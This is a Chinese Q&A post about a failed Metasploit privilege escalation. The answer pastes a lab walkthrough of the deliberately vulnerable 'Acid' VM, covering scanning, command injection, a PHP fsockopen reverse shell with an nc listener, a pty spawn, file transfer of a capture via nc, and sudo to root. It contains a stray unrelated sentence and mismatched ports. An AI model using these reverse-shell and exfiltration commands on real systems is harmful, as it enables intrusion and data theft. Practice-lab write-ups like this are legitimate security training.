kali渗透进去了win10主机，提权提不了，求大神指导？

Posted 2023-05-09

最后提权执行exploit的时候错了为什么

参考技术A

你没指定session。百度随便一搜就是MSF提权。比如这个

靶机渗透实战-Acid

文章目录

这几天有点事情,靶机方面就没在更新,后边会积极的更新。

---

文章目录

• 文章目录
• 信息收集
• 漏洞发现利用
• 提权
• 总结

---

信息收集

信息收集是必不可少的.

• 首先用自己的kali当攻击机,下载acid靶机
  靶机下载地址
• 首先进行靶机发现
  nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描（128是kali地址)
  
• 然后对主机进行端口扫描

nmap -sV -T4 -A -p- 192.168.240.137
其中sV 扫描版本信息和开放的服务 ,
-A扫描开放端口的具体服务

• 发现端口33447
  访问之发现是个网站
  
  用dirsearch 扫描目录
  
  没有什么有价值的东西,查看源码
  
  发现/Challenge 访问之,当然题目名是这个
  eee 我没发现

发现apache版本信息,可以搜索有没有相关cve漏洞之类的

漏洞发现利用

发现是一个登入框

尝试注入啥的都不行那末继续进行网站目录扫描,ovo 没扫到.
尝试用dirbuster 扫面

• kali 直接输入dirbuster 打开即可
  用dirsearch 7zscan等没有扫到
  

经目录扫描得到，
Magic_Box/command.php 也是如此不一一列举

http://192.168.240.137:33447/Challenge/Magic_Box/command.php

发现了一个好东西

用|进行命令注入 成功!

利用 sock反弹shell

<?php
$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");

得到php -r '$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url加密

1nc -lvvp 1234进行监听
成功send 发包成功反弹

拿到shell

提权

常规思路利用python 进行提权

python -c  "import pty; pty.spawn('/bin/bash')"

发现需要密码,那就找密码
查看passwd 权限是否可以写入

• 如果可以写入的话可以添加一个新的具有root权限的账户 输入命令perl -le 'print crypt("pass","aa")' pass是加密的密码, aa表示加密盐如果不使用则默认是md5加密格式.
• 然后将创建的用户写入passwd 再sudo即可
  这是一种思路,这里却不行
  
  那末换思路
  
  这俩具有root 权限
  查找一下该账户的相关文件
  示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。

查找每个用户的文件

find / -user 2>/dev/null  

2`是标准错误的意思,/dev/null指空设备,表示将标准错误输入到空设备中`

发现hint.pcapng

用nc来传输文件内

• 首先使用nc -lvnp 3344> hint.pcapng来监听传输听口
• 然后在shell中使用nc 192.168.240.128 1234 </sbin/raw_vs_isi/hint.pcapng传输过去
  
  成功接收
  追踪tcp流,发现可以地方 疑似密码
  
  尝试登入1337hax0r
  用户名saman
  然后用sudo -i 提权到root
  

成功!!! 结束

总结

这个学到很多的东西

• 用php -c进行 反弹shell

php -c "
$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");
"

然后用python -c "import pty;pty.spawn(’/bin/bash’);"进行提权 结合用 find / -user 2>/dev/null 查找关于用户的文件

• 用nc url port < 文件名 进行文件传输
• 用 DirBuster进行目录扫描